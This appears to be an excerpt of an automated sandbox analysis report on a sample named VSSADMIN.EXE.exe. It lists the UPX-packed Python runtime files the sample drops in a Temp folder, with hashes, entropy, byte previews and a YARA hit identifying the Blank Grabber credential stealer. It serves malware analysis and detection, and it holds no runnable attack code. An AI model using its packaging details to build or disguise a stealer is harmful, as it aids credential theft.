                                                                                                                                                                    Size (bytes):36120
                                                                                                                                                                    Entropy (8bit):7.694581667669348
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:5rusWqAYiGR2VL0gdxwxpj9bTIPOICR5YiSyv4PxWEu:5ynqA/dL0gdxwX9bTIPOICf7SygPx
                                                                                                                                                                    MD5:F10D896ED25751EAD72D8B03E404EA36
                                                                                                                                                                    SHA1:EB8E0FD6E2356F76B5EA0CB72AB37399EC9D8ECB
                                                                                                                                                                    SHA-256:3660B985CA47CA1BBA07DB01458B3153E4E692EE57A8B23CE22F1A5CA18707C3
                                                                                                                                                                    SHA-512:7F234E0D197BA48396FABD1FCCC2F19E5D4AD922A2B3FE62920CD485E5065B66813B4B2A2477D2F7F911004E1BC6E5A6EC5E873D8FF81E642FEE9E77B428FB42
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".P........... .......................................@............`..........................................;..P....9.......0..........,............;.......................................,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):87824
                                                                                                                                                                    Entropy (8bit):7.919149468371103
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:AUZZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6VWLZLpIPZ1887SyKPxN:AIvA5utzWfXE0V0ZK+K+QLHIPZ188ExN
                                                                                                                                                                    MD5:3798175FD77EDED46A8AF6B03C5E5F6D
                                                                                                                                                                    SHA1:F637EAF42080DCC620642400571473A3FDF9174F
                                                                                                                                                                    SHA-256:3C9D5A9433B22538FC64141CD3784800C567C18E4379003329CF69A1D59B2A41
                                                                                                                                                                    SHA-512:1F7351C9E905265625D725551D8EA1DE5D9999BC333D29E6510A5BCA4E4D7C1472B2A637E892A485A7437EA4768329E5365B209DD39D7C1995FE3317DC5AECDF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26384
                                                                                                                                                                    Entropy (8bit):7.48274363176083
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:r0Psz9rLZgNhzHjlHv0vFTMwZa7gJXTDIPQUCNQHQIYiSy1pCQqIPxh8E9VF0Nyo:RihFP0tTHpDDIPQUCI5YiSyv3PxWEun
                                                                                                                                                                    MD5:DECDABACA104520549B0F66C136A9DC1
                                                                                                                                                                    SHA1:423E6F3100013E5A2C97E65E94834B1B18770A87
                                                                                                                                                                    SHA-256:9D4880F7D0129B1DE95BECD8EA8BBBF0C044D63E87764D18F9EC00D382E43F84
                                                                                                                                                                    SHA-512:D89EE3779BF7D446514FC712DAFB3EBC09069E4F665529A7A1AF6494F8955CEB040BEF7D18F017BCC3B6FE7ADDEAB104535655971BE6EED38D0FC09EC2C37D88
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1...0...1...4...1...5...1...2...1.~.0...1...0...1...0...1.~.<...1.~.1...1.~.....1.~.3...1.Rich..1.........PE..d......d.........." ...".0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):44312
                                                                                                                                                                    Entropy (8bit):7.711982997288045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:fLQ8MABQVeC50swbKjNcoVApXo2gwl49wMvfscpZTfIPLwnFW5YiSyvhPxWEu:zTIt50swZoKp929fsiTfIPLwnFs7SyZ5
                                                                                                                                                                    MD5:BCC3E26A18D59D76FD6CF7CD64E9E14D
                                                                                                                                                                    SHA1:B85E4E7D300DBEEC942CB44E4A38F2C6314D3166
                                                                                                                                                                    SHA-256:4E19F29266A3D6C127E5E8DE01D2C9B68BC55075DD3D6AABE22CF0DE4B946A98
                                                                                                                                                                    SHA-512:65026247806FEAB6E1E5BF2B29A439BDC1543977C1457F6D3DDFBB7684E04F11ABA10D58CC5E7EA0C2F07C8EB3C9B1C8A3668D7854A9A6E4340E6D3E43543B74
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):57616
                                                                                                                                                                    Entropy (8bit):7.828956573011499
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:vUoHNtQh2qxFtxAnHq70rF7VRUjCpcIPOQ397SyU8Pxp:vUiNtQhxAnMORUmOIPOQ39xxp
                                                                                                                                                                    MD5:EB6313B94292C827A5758EEA82D018D9
                                                                                                                                                                    SHA1:7070F715D088C669EDA130D0F15E4E4E9C4B7961
                                                                                                                                                                    SHA-256:6B41DFD7D6AC12AFE523D74A68F8BD984A75E438DCF2DAA23A1F934CA02E89DA
                                                                                                                                                                    SHA-512:23BFC3ABF71B04CCFFC51CEDF301FADB038C458C06D14592BF1198B61758810636D9BBAC9E4188E72927B49CB490AEAFA313A04E3460C3FB4F22BDDDF112AE56
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................n.....M.......M.......M.......M.......M...............I..............................................Rich....................PE..d...%..d.........." ...".........`.......p...................................0............`..........................................+..P....)....... .......................+..$.......................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):63760
                                                                                                                                                                    Entropy (8bit):7.859117864085156
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:NHBhG6a7BLI9d70XIKNSTuGaLOIPC7s0K7Sy1Pxd:/hI67uIKNSTICIPC7sBDxd
                                                                                                                                                                    MD5:2089768E25606262921E4424A590FF05
                                                                                                                                                                    SHA1:BC94A8FF462547AB48C2FBF705673A1552545B76
                                                                                                                                                                    SHA-256:3E6E9FC56E1A9FE5EDB39EE03E5D47FA0E3F6ADB17BE1F087DC6F891D3B0BBCA
                                                                                                                                                                    SHA-512:371AA8E5C722307FFF65E00968B14280EE5046CFCF4A1D9522450688D75A3B0362F2C9EC0EC117B2FC566664F2F52A1B47FE62F28466488163F9F0F1CE367F86
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."..................................................................`.........................................p...d....................P..........................................................@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\base_library.zip

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1847603
                                                                                                                                                                    Entropy (8bit):5.576587358103163
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:mQR5pATu7xm4lUKdcubgAnyfbazZ0iwh9EpdYf9P3sLoThUdWQhuHHa:mQR5plxm+zJ5uUwQ5
                                                                                                                                                                    MD5:E17CE7183E682DE459EEC1A5AC9CBBFF
                                                                                                                                                                    SHA1:722968CA6EB123730EBC30FF2D498F9A5DAD4CC1
                                                                                                                                                                    SHA-256:FF6A37C49EE4BB07A763866D4163126165038296C1FB7B730928297C25CFBE6D
                                                                                                                                                                    SHA-512:FAB76B59DCD3570695FA260F56E277F8D714048F3D89F6E9F69EA700FCA7C097D0DB5F5294BEAB4E6409570408F1D680E8220851FEDEDB981ACB129A415358D1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\blank.aes

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):121387
                                                                                                                                                                    Entropy (8bit):7.618787730767029
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:s9MWCXD1NbuF8RAXYgM5smBW4DV0Qe7vVBijA9iHR/SWSnMzuq/AhMW3eQ88YDl8:LDnbGK5vA4Re7vVBGAYHR/fp2eQRBU6v
                                                                                                                                                                    MD5:D0920254796FF3C0FA70785EEB43643E
                                                                                                                                                                    SHA1:BCAC44DAAEE04BA3364B9F926E6B2E963EF1F3DA
                                                                                                                                                                    SHA-256:405535B019A42D6CB102D100DAD541E9C17D7E2EC24CC767345BA06A14D290C8
                                                                                                                                                                    SHA-512:83C453123E8A787C1901D5E56765CA18F0BC7900C06368593D212336E1D88747AF2E071519CB212B00F8318683E7AA7F956A193820F71596C81563DB64E51CA6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:PK........F./W..;!............stub-o.pyc........Dm.e..........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\libcrypto-1_1.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1192216
                                                                                                                                                                    Entropy (8bit):7.944105809686233
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:OehIVnK0yupAu74grd7gqiAtpzdZveNuKF1CPwDv3uFfJR:SYupAm7d7gqNtpzzveNuM1CPwDv3uFff
                                                                                                                                                                    MD5:DFFCAB08F94E627DE159E5B27326D2FC
                                                                                                                                                                    SHA1:AB8954E9AE94AE76067E5A0B1DF074BCCC7C3B68
                                                                                                                                                                    SHA-256:135B115E77479EEDD908D7A782E004ECE6DD900BB1CA05CC1260D5DD6273EF15
                                                                                                                                                                    SHA-512:57E175A5883EDB781CDB2286167D027FDB4B762F41FB1FC9BD26B5544096A9C5DDA7BCCBB6795DCC37ED5D8D03DC0A406BF1A59ADB3AEB41714F1A7C8901A17D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ...".........`%..U5..p%...................................7...........`......................................... x5......s5.h....p5......p2..............x7......................................`5.@...........................................UPX0.....`%.............................UPX1.........p%.....................@....rsrc........p5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\libffi-8.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):29968
                                                                                                                                                                    Entropy (8bit):7.677818197322094
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                    MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                    SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                    SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                    SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\libssl-1_1.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):209688
                                                                                                                                                                    Entropy (8bit):7.925110241108709
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:de9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNI2DglFjEW0wuDmxD:A99u/XRxpK8M111nEE0iGYzi9jd0wN
                                                                                                                                                                    MD5:8E8A145E122A593AF7D6CDE06D2BB89F
                                                                                                                                                                    SHA1:B0E7D78BB78108D407239E9F1B376E0C8C295175
                                                                                                                                                                    SHA-256:A6A14C1BECCBD4128763E78C3EC588F747640297FFB3CC5604A9728E8EF246B1
                                                                                                                                                                    SHA-512:D104D81ACA91C067F2D69FD8CEC3F974D23FB5372A8F2752AD64391DA3DBF5FFE36E2645A18A9A74B70B25462D73D9EA084318846B7646D39CE1D3E65A1C47C4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".....P...`..p....p................................................`..........................................6..4@...3.......0...........N...........v......................................p&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\python311.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1699608
                                                                                                                                                                    Entropy (8bit):7.993586114049122
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:24576:IzvTIooNigMzmPPExBYeZ0pqJx5F7vYNBw5K2RH9lVggq4lUTNeTVZXo3uYIPDhh:C9oNizvxB3ZAEx5ONCVwXUmeTVlv
                                                                                                                                                                    MD5:5792ADEAB1E4414E0129CE7A228EB8B8
                                                                                                                                                                    SHA1:E9F022E687B6D88D20EE96D9509F82E916B9EE8C
                                                                                                                                                                    SHA-256:7E1370058177D78A415B7ED113CC15472974440D84267FC44CDC5729535E3967
                                                                                                                                                                    SHA-512:C8298B5780A2A5EEBED070AC296EDA6902B0CAC9FDA7BB70E21F482D6693D6D2631CA1AC4BE96B75AC0DD50C9CA35BE5D0ACA9C4586BA7E58021EDCCD482958B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ..."..........D...]...D...................................^...........`.........................................H.].......].......].......V.d0............^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):630736
                                                                                                                                                                    Entropy (8bit):6.409476333013752
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                    MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                    SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                    SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                    SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):456
                                                                                                                                                                    Entropy (8bit):4.447296373872587
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                    MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                    SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                    SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                    SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\select.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26384
                                                                                                                                                                    Entropy (8bit):7.438368098774459
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:UjW1JOQuL3pJbNIPQGCF5YiSyvnnPxWEuN:UjW1AnbNIPQGCL7SyvnPxa
                                                                                                                                                                    MD5:90FEA71C9828751E36C00168B9BA4B2B
                                                                                                                                                                    SHA1:15B506DF7D02612E3BA49F816757AD0C141E9DC1
                                                                                                                                                                    SHA-256:5BBBB4F0B4F9E5329BA1D518D6E8144B1F7D83E2D7EAF6C50EEF6A304D78F37D
                                                                                                                                                                    SHA-512:E424BE422BF0EF06E7F9FF21E844A84212BFA08D7F9FBD4490CBBCB6493CC38CC1223AAF8B7C9CD637323B81EE93600D107CC1C982A2288EB2A0F80E2AD1F3C5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\sqlite3.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):637720
                                                                                                                                                                    Entropy (8bit):7.994077868940962
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:12288:2VROCPPIR0z79c8aCucuAVbXiFHTiDheVoxz0u4d0M2A9UCC:2VERAc83uc1XiJly01hUCC
                                                                                                                                                                    MD5:395332E795CB6ABACA7D0126D6C1F215
                                                                                                                                                                    SHA1:B845BD8864CD35DCB61F6DB3710ACC2659ED9F18
                                                                                                                                                                    SHA-256:8E8870DAC8C96217FEFF4FA8AF7C687470FBCCD093D97121BC1EAC533F47316C
                                                                                                                                                                    SHA-512:8BC8C8C5F10127289DEDB012B636BC3959ACB5C15638E7ED92DACDC8D8DBA87A8D994AAFFC88BC7DC89CCFEEF359E3E79980DFA293A9ACAE0DC00181096A0D66
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3...R...R...R...*&..R..@....R..@....R..@....R..@....R..D*...R...R...R.......R.......R....J..R.......R..Rich.R..........................PE..d......d.........." ...".`...0......p,.......................................p............`..........................................K..."...H.......@.......................m.......................................8..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):302872
                                                                                                                                                                    Entropy (8bit):7.986772329138341
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:ik/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9Kik+V65:ikUfQJbUV2MhCwEQc5Np9zk+U5
                                                                                                                                                                    MD5:C2556DC74AEA61B0BD9BD15E9CD7B0D6
                                                                                                                                                                    SHA1:05EFF76E393BFB77958614FF08229B6B770A1750
                                                                                                                                                                    SHA-256:987A6D21CE961AFEAAA40BA69859D4DD80D20B77C4CA6D2B928305A873D6796D
                                                                                                                                                                    SHA-512:F29841F262934C810DD1062151AEFAC78CD6A42D959A8B9AC832455C646645C07FD9220866B262DE1BC501E1A9570591C0050D5D3607F1683437DEA1FF04C32B
                                                                                                                                                                    Malicious:true
